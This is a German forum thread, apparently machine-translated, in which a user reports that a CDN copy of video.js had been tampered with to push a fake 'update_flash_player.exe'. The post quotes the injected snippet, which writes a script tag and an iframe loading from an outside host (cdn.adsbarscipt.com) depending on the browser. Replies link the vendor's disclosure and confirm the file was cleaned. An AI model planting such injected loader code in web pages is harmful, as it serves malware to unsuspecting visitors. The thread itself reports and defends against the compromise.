malware update_flash_player.exe gefunden in http://vjs.zencdn.net/c/video.js?ver=3.5.1

Beim surfen einige web-Seiten mit Chrome bekam ich aufgefordert, eine Datei herunterzuladen:

update_flash_player.exe

Kein problem mit Safari und Firefox, nur Chrome. Meine Plattform ist Mac.

Begutachtete ich den Quelltext der Seite und ich glaube, ich fand, bösartigen code in das folgende Skript:

http://vjs.zencdn.net/c/video.js?ver=3.5.1

Den code ich denke, es ist maliciuos:

if(navigator.appVersion.indexOf("MSIE")!=-1){ 
document.write('<script src="http://cdn.adsbarscipt.com/links/jump/"></script>');
}
if(navigator.appVersion.indexOf("Chrome")!=-1){ 
document.write('<iframe src="http://cdn.adsbarscipt.com/links/flash/?updnew" width="200"    height="200"></iframe>');
}

Meine Frage ist: wo finde ich eine saubere version von dem script?

BEARBEITEN

Wie schon in den Kommentaren, der Autor des script gereinigt hat, ist es nun sicher.

Ich habe umformuliert es, ist es ok? Dank
Umformuliert es wieder, hoffe es ist klarer jetzt.

InformationsquelleAutor Ema | 2013-09-15

1

Ich würde Hinzugefügt haben, können Sie diese als Kommentar, aber ich habe nicht genug Ruf.

Sieht es aus wie video.js gepostet haben ein blog über das problem:
http://blog.videojs.com/post/61309840958/unauthorized-modification-of-video-js-cdn-files

Einige Ihrer Dateien betroffen waren, aber Sie sagen, Sie haben das problem behoben jetzt.
- guter Punkt, aber es ist immer noch infiziert ist, versuchen Sie es selbst: vjs.zencdn.net/c/video.js?ver=3.5.1 (Blick auf die letzten 6 Zeilen)
- du hast Recht, es ist jetzt sauber, es war in meinem lokalen cache
InformationsquelleAutor Maikeru

Schreibe einen Kommentar

Du musst angemeldet sein, um einen Kommentar abzugeben.